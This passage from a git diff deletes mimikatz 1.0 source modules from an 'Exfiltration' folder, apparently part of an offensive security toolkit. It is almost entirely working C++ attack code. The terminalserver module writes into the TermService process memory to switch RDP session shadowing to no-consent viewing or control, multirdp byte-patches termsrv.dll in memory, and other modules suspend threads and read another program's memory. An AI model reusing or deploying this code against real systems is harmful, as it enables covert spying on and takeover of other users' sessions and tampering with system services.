\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_service.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_service.h deleted file mode 100644 index 368066f..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_service.h +++ /dev/null @@ -1,34 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_system.h" -#include "mod_service.h" -#include <iostream> - -class mod_mimikatz_service -{ -private: - typedef bool (* PMOD_SERVICE_FUNC) (wstring * serviceName, wstring * machineName); - static bool genericFunction(PMOD_SERVICE_FUNC function, vector<wstring> * arguments); -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool list(vector<wstring> * arguments); - - static bool start(vector<wstring> * arguments); - static bool suspend(vector<wstring> * arguments); - static bool resume(vector<wstring> * arguments); - static bool stop(vector<wstring> * arguments); - - static bool query(vector<wstring> * arguments); - - static bool add(vector<wstring> * arguments); - static bool remove(vector<wstring> * arguments); - static bool control(vector<wstring> * arguments); - - static bool mimikatz(vector<wstring> * arguments); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_standard.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_standard.cpp deleted file mode 100644 index e785e0d..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_standard.cpp +++ /dev/null @@ -1,77 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` -http://blog.gentilkiwi.com -benjamin@gentilkiwi.com -Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_standard.h" -#include "..\global.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_standard::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(clearScreen, L"cls", L"Efface l\'écran (ne fonctionne pas en éxecution distante, via PsExec par exemple)")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(exit, L"exit", L"Quitte MimiKatz")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(reponse, L"reponse", L"Calcule la réponse à la Grande Question sur la Vie, l\'Univers et le Reste")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(cite, L"cite", L"Trouve une citation")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(version, L"version", L"Retourne la version de mimikatz")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(sleep, L"sleep", L"Mets en pause mimikatz un certains nombre de millisecondes")); - //monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(test, L"test", L"Routine de test (ne devrait plus être là en release...")); - return monVector; -} - -/*bool mod_mimikatz_standard::test(vector<wstring> * arguments) -{ - return true; -}*/ - -bool mod_mimikatz_standard::version(vector<wstring> * arguments) -{ - (*outputStream) << MIMIKATZ_FULL << L" (" << __DATE__ << L' ' << __TIME__ << L')' << endl; - return true; -} - -bool mod_mimikatz_standard::clearScreen(vector<wstring> * arguments) -{ - HANDLE hStdOut = GetStdHandle(STD_OUTPUT_HANDLE); - COORD coord = {0, 0}; - DWORD count; - - CONSOLE_SCREEN_BUFFER_INFO csbi; - GetConsoleScreenBufferInfo(hStdOut, &csbi); - - FillConsoleOutputCharacter(hStdOut, L' ', csbi.dwSize.X * csbi.dwSize.Y, coord, &count); - SetConsoleCursorPosition(hStdOut, coord); - - return true; -} - -bool mod_mimikatz_standard::exit(vector<wstring> * arguments) -{ - return false; -} - -bool mod_mimikatz_standard::reponse(vector<wstring> * arguments) -{ - (*outputStream) << L"La réponse est 42." << endl; - return true; -} - -bool mod_mimikatz_standard::cite(vector<wstring> * arguments) -{ - (*outputStream) << L"I edit the world in HEX" << endl; - return true; -} - -bool mod_mimikatz_standard::sleep(vector<wstring> * arguments) -{ - DWORD dwMilliseconds = 1000; - if(!arguments->empty()) - { - wstringstream z; - z << arguments->front(); z >> dwMilliseconds; - } - (*outputStream) << L"Sleep : " << dwMilliseconds << L" ms... " << flush; - Sleep(dwMilliseconds); - (*outputStream) << L"Fin !" << endl; - return true; -} diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_standard.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_standard.h deleted file mode 100644 index dab1350..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_standard.h +++ /dev/null @@ -1,23 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include <iostream> -#include <sstream> - -class mod_mimikatz_standard -{ -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool clearScreen(vector<wstring> * arguments); - static bool exit(vector<wstring> * arguments); - static bool cite(vector<wstring> * arguments); - static bool reponse(vector<wstring> * arguments); - static bool version(vector<wstring> * arguments); - static bool sleep(vector<wstring> * arguments); - static bool test(vector<wstring> * arguments); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_system.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_system.cpp deleted file mode 100644 index 90929b2..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_system.cpp +++ /dev/null @@ -1,40 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_system.h" -#include "..\global.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_system::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(user, L"user", L"Affiche l\'utilisateur courant")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(computer, L"computer", L"Affiche le nom d\'ordinateur courant")); - return monVector; -} - -bool mod_mimikatz_system::user(vector<wstring> * arguments) -{ - wstring monUser; - - if(mod_system::getUserName(&monUser)) - (*outputStream) << L"Utilisateur : " << monUser << endl; - else - (*outputStream) << L"mod_system::getUserName : " << mod_system::getWinError(); - - return true; -} - -bool mod_mimikatz_system::computer(vector<wstring> * arguments) -{ - wstring monComputer; - - if(mod_system::getComputerName(&monComputer)) - (*outputStream) << L"Ordinateur : " << monComputer << endl; - else - (*outputStream) << L"mod_system::getComputerName : " << mod_system::getWinError(); - - return true; -} - diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_system.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_system.h deleted file mode 100644 index bd96a01..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_system.h +++ /dev/null @@ -1,17 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_system.h" -#include <iostream> - -class mod_mimikatz_system -{ -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - static bool user(vector<wstring> * arguments); - static bool computer(vector<wstring> * arguments); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_terminalserver.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_terminalserver.cpp deleted file mode 100644 index 9a071b1..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_terminalserver.cpp +++ /dev/null @@ -1,291 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_terminalserver.h" -#include "..\global.h" - -// http://msdn.microsoft.com/library/aa383464.aspx -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_terminalserver::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(sessions, L"sessions")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(processes, L"processes")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(multirdp, L"multirdp", L"Patch le bureau à distance pour dépasser 2 connexions simultanées")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(viewshadow, L"viewshadow", L"Affiche l\'état de la prise de contrôle des sessions RDP")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(modifyshadow, L"modifyshadow", L"Modifie l\'état de la prise de contrôle des sessions RDP (DISABLE, INTERACT, INTERACT_NOASK, VIEW, VIEW_NOASK)")); - return monVector; -} - -bool mod_mimikatz_terminalserver::sessions(vector<wstring> * arguments) -{ - vector<mod_ts::KIWI_WTS_SESSION_INFO> mesSessions; - - if(mod_ts::getSessions(&mesSessions, (arguments->size() ? &arguments->front() : NULL))) - { - (*outputStream) << L"SessId\tEtat\tstrEtat" << endl; - for(vector<mod_ts::KIWI_WTS_SESSION_INFO>::iterator maSession = mesSessions.begin(); maSession != mesSessions.end(); maSession++) - { - (*outputStream) << - setw(5) << setfill(wchar_t(' ')) << maSession->id << L'\t' << - setw(5) << setfill(wchar_t(' ')) << maSession->state << L'\t' << - setw(15) << setfill(wchar_t(' ')) << left << stateToType(maSession->state) << right << L'\t' << - maSession->sessionName << - endl; - } - } - else (*outputStream) << L"mod_ts::getSessions : " << mod_system::getWinError() << endl; - return true; -} - - -bool mod_mimikatz_terminalserver::processes(vector<wstring> * arguments) -{ - vector<mod_ts::KIWI_WTS_PROCESS_INFO> mesProcess; - - if(mod_ts::getProcesses(&mesProcess, (arguments->size() ? &arguments->front() : NULL))) - { - (*outputStream) << L"PID\tSessId\tUtilisateur" << endl; - for(vector<mod_ts::KIWI_WTS_PROCESS_INFO>::iterator monProcess = mesProcess.begin(); monProcess != mesProcess.end(); monProcess++) - { - (*outputStream) << - setw(5) << setfill(wchar_t(' ')) << monProcess->pid << L'\t' << - setw(5) << setfill(wchar_t(' ')) << monProcess->sessionId << L'\t' << - setw(48) << setfill(wchar_t(' ')) << left << monProcess->userSid << right << L'\t' << - monProcess->processName << - endl; - } - } - else (*outputStream) << L"mod_ts::getSessions : " << mod_system::getWinError() << endl; - return true; -} - -bool mod_mimikatz_terminalserver::viewshadow(vector<wstring> * arguments) -{ - DWORD session = 0; - PDWORD ptrSession = NULL; - - if(arguments->size() == 1) - { - wstringstream resultat(arguments->front()); - resultat >> session; - ptrSession = &session; - } - - listAndOrModifySession(ptrSession); - return true; -} - -bool mod_mimikatz_terminalserver::modifyshadow(vector<wstring> * arguments) -{ - DWORD session = 0; - PDWORD ptrSession = NULL; - - wstring strState; - DWORD newState = 0; - - if(arguments->size() == 1) - { - strState.assign(arguments->front()); - } - else if(arguments->size() == 2) - { - wstringstream resultat(arguments->front()); - resultat >> session; - ptrSession = &session; - - strState.assign(arguments->back()); - } - - if(!strState.empty()) - { - bool strError = false; - if(_wcsicmp(strState.c_str(), L"DISABLE") == 0) newState = 0; - else if(_wcsicmp(strState.c_str(), L"INTERACT") == 0) newState = 1; - else if(_wcsicmp(strState.c_str(), L"INTERACT_NOASK") == 0) newState = 2; - else if(_wcsicmp(strState.c_str(), L"VIEW") == 0) newState = 3; - else if(_wcsicmp(strState.c_str(), L"VIEW_NOASK") == 0) newState = 4; - else strError = true; - - if(!strError) - listAndOrModifySession(ptrSession, &newState); - else - (*outputStream) << L"Erreur de parsing de l\'argument : " << strState << endl; - } - - return true; -} - -bool mod_mimikatz_terminalserver::listAndOrModifySession(DWORD * id, DWORD * newState) -{ - bool reussite = false; - - vector<mod_patch::OS> mesOS; - mesOS.push_back(mod_patch::WINDOWS_2003_____x86); - mesOS.push_back(mod_patch::WINDOWS_2003_____x64); - mesOS.push_back(mod_patch::WINDOWS_XP_PRO___x86); - mesOS.push_back(mod_patch::WINDOWS_XP_PRO___x64); - - if(mod_patch::checkVersion(&mesOS)) - { -#ifdef _M_X64 - BYTE pattern1NT5[] = {0x48, 0x3B, 0xFE, 0x74, 0x22}; - long offsetToWin = -4; -#elif defined _M_IX86 - BYTE pattern1NT5[] = {0x8D, 0x47, 0x20, 0x53, 0x50, 0xFF, 0x15}; - long offsetToWin = -6; -#endif - mod_service::KIWI_SERVICE_STATUS_PROCESS monService; - wstring serviceName = L"TermService"; - wstring moduleName = L"termsrv.dll"; - - if(mod_service::getUniqueForName(&monService, &serviceName)) - { - mod_process::KIWI_MODULEENTRY32 monModule; - if(mod_process::getUniqueModuleForName(&monModule, &moduleName, &monService.ServiceStatusProcess.dwProcessId)) - { - PBYTE baseAddr = monModule.modBaseAddr; - DWORD taille = monModule.modBaseSize; - - if(HANDLE processHandle = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, monService.ServiceStatusProcess.dwProcessId)) - { - PBYTE addrPattern = NULL; - if(mod_memory::searchMemory(baseAddr, baseAddr + taille, pattern1NT5, &addrPattern, sizeof(pattern1NT5), true, processHandle)) - { - PBYTE addrWinstationListHead = NULL; - - bool resInterm = false; - -#ifdef _M_X64 - long offSet = 0; - resInterm = mod_memory::readMemory(addrPattern + offsetToWin, reinterpret_cast<PBYTE>(&offSet), sizeof(long), processHandle); - addrWinstationListHead = addrPattern + offSet; -#elif defined _M_IX86 - resInterm = mod_memory::readMemory(addrPattern + offsetToWin, reinterpret_cast<PBYTE>(&addrWinstationListHead), sizeof(PBYTE), processHandle); -#endif - if(resInterm) - { - PBYTE addrWinstation = addrWinstationListHead; - do - { - if(mod_memory::readMemory(addrWinstation, reinterpret_cast<PBYTE>(&addrWinstation), sizeof(PBYTE), processHandle) && addrWinstation != addrWinstationListHead) - { - KIWI_TS_SESSION * maSession = new KIWI_TS_SESSION(); - if(reussite = mod_memory::readMemory(addrWinstation, reinterpret_cast<PBYTE>(maSession), sizeof(KIWI_TS_SESSION), processHandle)) - { - if((!id) || (maSession->id == *id)) - { - (*outputStream) << L"@Winstation : " << addrWinstation << endl; - - (*outputStream) << L"\t" << maSession->prev << L" <-> " << maSession->next << endl; - (*outputStream) << L"\tid : " << maSession->id << endl; - (*outputStream) << L"\tname : " << maSession->name << endl; - (*outputStream) << L"\tsname : " << maSession->sname << endl; - (*outputStream) << L"\ttype : " << maSession->type << endl; - (*outputStream) << L"\tshadow : " << maSession->shadow << L" (" << shadowToType(maSession->shadow) << L")" << endl; - - if(newState) - { - reussite = mod_memory::writeMemory(addrWinstation + FIELD_OFFSET(KIWI_TS_SESSION, shadow), newState, sizeof(DWORD), processHandle); - (*outputStream) << L"\t => " << *newState << L" (" <<shadowToType(*newState) << L") : " << (reussite ? L"OK" : L"KO") << endl; - } - (*outputStream) << endl; - } - } - delete maSession; - } - } while(addrWinstation != addrWinstationListHead); - } - else (*outputStream) << L"mod_memory::readMemory " << mod_system::getWinError() << endl; - } - else (*outputStream) << L"mod_memory::searchMemory " << mod_system::getWinError() << endl; - - CloseHandle(processHandle); - } - else (*outputStream) << L"OpenProcess " << mod_system::getWinError() << endl; - } - else (*outputStream) << L"mod_process::getUniqueModuleForName : " << mod_system::getWinError() << endl; - } - else (*outputStream) << L"mod_process::getUniqueServiceForName : " << mod_system::getWinError() << endl; - } - return reussite; -} - -bool mod_mimikatz_terminalserver::multirdp(vector<wstring> * arguments) -{ - BYTE PTRN_WIN5_TestLicence[] = {0x83, 0xf8, 0x02, 0x7f}; - BYTE PATC_WIN5_TestLicence[] = {0x90, 0x90}; - LONG OFFS_WIN5_TestLicence = 3; -#ifdef _M_X64 - BYTE PTRN_WN60_Query__CDefPolicy[] = {0x8b, 0x81, 0x38, 0x06, 0x00, 0x00, 0x39, 0x81, 0x3c, 0x06, 0x00, 0x00, 0x75}; - BYTE PATC_WN60_Query__CDefPolicy[] = {0xc7, 0x81, 0x3c, 0x06, 0x00, 0x00, 0xff, 0xff, 0xff, 0x7f, 0x90, 0x90, 0xeb}; - BYTE PTRN_WN6x_Query__CDefPolicy[] = {0x39, 0x87, 0x3c, 0x06, 0x00, 0x00, 0x0f, 0x84}; - BYTE PATC_WN6x_Query__CDefPolicy[] = {0xc7, 0x87, 0x3c, 0x06, 0x00, 0x00, 0xff, 0xff, 0xff, 0x7f, 0x90, 0x90}; -#elif defined _M_IX86 - BYTE PTRN_WN60_Query__CDefPolicy[] = {0x3b, 0x91, 0x20, 0x03, 0x00, 0x00, 0x5e, 0x0f, 0x84}; - BYTE PATC_WN60_Query__CDefPolicy[] = {0xc7, 0x81, 0x20, 0x03, 0x00, 0x00, 0xff, 0xff, 0xff, 0x7f, 0x5e, 0x90, 0x90}; - BYTE PTRN_WN6x_Query__CDefPolicy[] = {0x3b, 0x86, 0x20, 0x03, 0x00, 0x00, 0x0f, 0x84}; - BYTE PATC_WN6x_Query__CDefPolicy[] = {0xc7, 0x86, 0x20, 0x03, 0x00, 0x00, 0xff, 0xff, 0xff, 0x7f, 0x90, 0x90}; -#endif - LONG OFFS_WIN6_Query__CDefPolicy = 0; - - BYTE * PTRN_Licence = NULL; DWORD SIZE_PTRN_Licence = 0; - BYTE * PATC_Licence = NULL; DWORD SIZE_PATC_Licence = 0; - LONG OFFS_PATC_Licence = 0; - if(mod_system::GLOB_Version.dwMajorVersion < 6) - { - PTRN_Licence = PTRN_WIN5_TestLicence; SIZE_PTRN_Licence = sizeof(PTRN_WIN5_TestLicence); - PATC_Licence = PATC_WIN5_TestLicence; SIZE_PATC_Licence = sizeof(PATC_WIN5_TestLicence); - OFFS_PATC_Licence = OFFS_WIN5_TestLicence; - } - else - { - if(mod_system::GLOB_Version.dwMinorVersion < 1) - { - PTRN_Licence = PTRN_WN60_Query__CDefPolicy; SIZE_PTRN_Licence = sizeof(PTRN_WN60_Query__CDefPolicy); - PATC_Licence = PATC_WN60_Query__CDefPolicy; SIZE_PATC_Licence = sizeof(PATC_WN60_Query__CDefPolicy); - } - else - { - PTRN_Licence = PTRN_WN6x_Query__CDefPolicy; SIZE_PTRN_Licence = sizeof(PTRN_WN6x_Query__CDefPolicy); - PATC_Licence = PATC_WN6x_Query__CDefPolicy; SIZE_PATC_Licence = sizeof(PATC_WN6x_Query__CDefPolicy); - } - OFFS_PATC_Licence = OFFS_WIN6_Query__CDefPolicy; - } - - mod_patch::patchModuleOfService(L"TermService", L"termsrv.dll", PTRN_Licence, SIZE_PTRN_Licence, PATC_Licence, SIZE_PATC_Licence, OFFS_PATC_Licence); - return true; -} - -wstring mod_mimikatz_terminalserver::shadowToType(DWORD shadow) -{ - switch(shadow) - { - case 0: return(L"DISABLE"); - case 1: return(L"INTERACT (confirmation)"); - case 2: return(L"INTERACT_NOASK"); - case 3: return(L"VIEW (confirmation)"); - case 4: return(L"VIEW_NOASK"); - default: return(L"?"); - } -} - -wstring mod_mimikatz_terminalserver::stateToType(DWORD state) -{ - switch(state) - { - case WTSActive: return(L"Active"); - case WTSConnected: return(L"Connected"); - case WTSConnectQuery: return(L"ConnectQuery"); - case WTSShadow: return(L"Shadow"); - case WTSDisconnected: return(L"Disconnected"); - case WTSIdle: return(L"Idle"); - case WTSListen: return(L"Listen"); - case WTSReset: return(L"Reset"); - case WTSDown: return(L"Down"); - case WTSInit: return(L"Init"); - - default: return(L"?"); - } -} diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_terminalserver.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_terminalserver.h deleted file mode 100644 index 5af9492..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_terminalserver.h +++ /dev/null @@ -1,55 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_ts.h" -#include "mod_process.h" -#include "mod_memory.h" -#include "mod_patch.h" -#include <iostream> - -class mod_mimikatz_terminalserver -{ -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool sessions(vector<wstring> * arguments); - static bool processes(vector<wstring> * arguments); - static bool viewshadow(vector<wstring> * arguments); - static bool modifyshadow(vector<wstring> * arguments); - static bool multirdp(vector<wstring> * arguments); - -private: - static bool listAndOrModifySession(DWORD * id = NULL, DWORD * newState = NULL); - static wstring shadowToType(DWORD shadow); - static wstring stateToType(DWORD state); - - enum KIWI_SHADOW_TYPE { - SHADOW_DISABLE = 0, - SHADOW_INTERACT = 1, - SHADOW_INTERACT_NOASK = 2, - SHADOW_VIEW = 3, - SHADOW_VIEW_NOASK = 4 - }; - - typedef struct _KIWI_TS_SESSION { - PBYTE next; - PBYTE prev; - PBYTE unk1; - PBYTE refLock; - PBYTE unk2; - BYTE unk3[8]; - DWORD id; - wchar_t name[32+1]; - BYTE unk4[7434]; - wchar_t sname[32+1]; - wchar_t type[32+1]; - BYTE unk5[1684]; - DWORD shadow; - } KIWI_TS_SESSION, * PKIWI_TS_SESSION; - -}; - diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_thread.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_thread.cpp deleted file mode 100644 index 3a8edc0..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_thread.cpp +++ /dev/null @@ -1,138 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_thread.h" -#include "..\global.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_thread::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(list, L"list", L"Liste les threads")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(suspend, L"suspend", L"Suspend un thread actif")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(resume, L"resume", L"Reprend un thread suspendu")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(stop, L"stop", L"Arrête un thread")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(quit, L"quit", L"Envoi un message de fermeture à un thread")); - return monVector; -} - -bool mod_mimikatz_thread::list(vector<wstring> * arguments) -{ - vector<THREADENTRY32> * vectorThreads = new vector<THREADENTRY32>(); - - DWORD processId = arguments->empty() ? 0 : _wtoi(arguments->front().c_str()); - - if(mod_thread::getList(vectorThreads, arguments->empty() ? NULL : &processId)) - { - (*outputStream) << L"PID\tTID\tprTh" << endl; - for(vector<THREADENTRY32>::iterator monThread = vectorThreads->begin(); monThread != vectorThreads->end(); monThread++) - (*outputStream) << - setw(5) << setfill(wchar_t(' ')) << monThread->th32OwnerProcessID << L'\t' << - setw(5) << setfill(wchar_t(' ')) << monThread->th32ThreadID << L'\t' << - setw(5) << setfill(wchar_t(' ')) << monThread->tpBasePri << - endl; - } - else - (*outputStream) << L"mod_thread::getList ; " << mod_system::getWinError() << endl; - - delete vectorThreads; - return true; -} - -bool mod_mimikatz_thread::resume(vector<wstring> * arguments) -{ - for(vector<wstring>::iterator monArgThread = arguments->begin(); monArgThread != arguments->end(); monArgThread++) - { - DWORD threadId = _wtoi(monArgThread->c_str()); - - if(threadId != 0) - { - (*outputStream) << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\treprise "; - - if(mod_thread::resume(threadId)) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO - mod_thread::resume ; " << mod_system::getWinError(); - } - else - (*outputStream) << L"argument \'" << *monArgThread << L"\' invalide"; - - (*outputStream) << endl; - } - - return true; -} - -bool mod_mimikatz_thread::suspend(vector<wstring> * arguments) -{ - for(vector<wstring>::iterator monArgThread = arguments->begin(); monArgThread != arguments->end(); monArgThread++) - { - DWORD threadId = _wtoi(monArgThread->c_str()); - - if(threadId != 0) - { - (*outputStream) << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\tsuspension "; - - if(mod_thread::suspend(threadId)) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO - mod_thread::suspend ; " << mod_system::getWinError(); - } - else - (*outputStream) << L"argument \'" << *monArgThread << L"\' invalide"; - - (*outputStream) << endl; - } - - return true; -} - -bool mod_mimikatz_thread::stop(vector<wstring> * arguments) -{ - for(vector<wstring>::iterator monArgThread = arguments->begin(); monArgThread != arguments->end(); monArgThread++) - { - DWORD threadId = _wtoi(monArgThread->c_str()); - - if(threadId != 0) - { - (*outputStream) << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\tarrêt "; - - if(mod_thread::stop(threadId)) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO - mod_thread::stop ; " << mod_system::getWinError(); - } - else - (*outputStream) << L"argument \'" << *monArgThread << L"\' invalide"; - - (*outputStream) << endl; - } - - return true; -} - - -bool mod_mimikatz_thread::quit(vector<wstring> * arguments) -{ - for(vector<wstring>::iterator monArgThread = arguments->begin(); monArgThread != arguments->end(); monArgThread++) - { - DWORD threadId = _wtoi(monArgThread->c_str()); - - if(threadId != 0) - { - (*outputStream) << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\tmessage fermeture "; - - if(mod_thread::quit(threadId)) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO - mod_thread::quit ; " << mod_system::getWinError(); - } - else - (*outputStream) << L"argument \'" << *monArgThread << L"\' invalide"; - - (*outputStream) << endl; - } - - return true; -} diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_thread.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_thread.h deleted file mode 100644 index fd072bf..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_thread.h +++ /dev/null @@ -1,27 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_system.h" -#include "mod_thread.h" -#include <iostream> -#include <iomanip> - -class mod_mimikatz_thread -{ -private: -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool list(vector<wstring> * arguments); - //static bool start(vector<wstring> * arguments); - static bool suspend(vector<wstring> * arguments); - static bool resume(vector<wstring> * arguments); - static bool stop(vector<wstring> * arguments); - //static bool query(vector<wstring> * arguments); - - static bool quit(vector<wstring> * arguments); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_winmine.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_winmine.cpp deleted file mode 100644 index 2f541f2..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_winmine.cpp +++ /dev/null @@ -1,162 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_winmine.h" -#include "..\global.h" - -char DISP_WINMINE[] = " 123456789*x*?F."; - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_winmine::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(infos, L"infos", L"Obtient des informations sur le démineur en cours")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(pause, L"pause", L"Met en pause le chronomètre du démineur en cours")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(reprise, L"reprise", L"Reprend le chronomètre du démineur en cours")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(start, L"start", L"Démarre une nouvelle partie")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(cheat, L"cheat", L"Triche au démineur")); - return monVector; -} - -bool mod_mimikatz_winmine::infos(vector<wstring> * arguments) -{ - return infosOrCheat(arguments, false); -} - -bool mod_mimikatz_winmine::cheat(vector<wstring> * arguments) -{ - return infosOrCheat(arguments, true); -} - -bool mod_mimikatz_winmine::infosOrCheat(vector<wstring> * arguments, bool cheat) -{ - structHandleAndAddr * maStruct = new structHandleAndAddr(); - if(giveHandleAndAddr(maStruct)) - { - structMonDemineur monDemineur; - if(mod_memory::readMemory(maStruct->addrMonDemineur, &monDemineur, sizeof(structMonDemineur), maStruct->hWinmine)) - { - (*outputStream) << L"Mines : " << monDemineur.nbMines << endl << - L"Dimension : " << 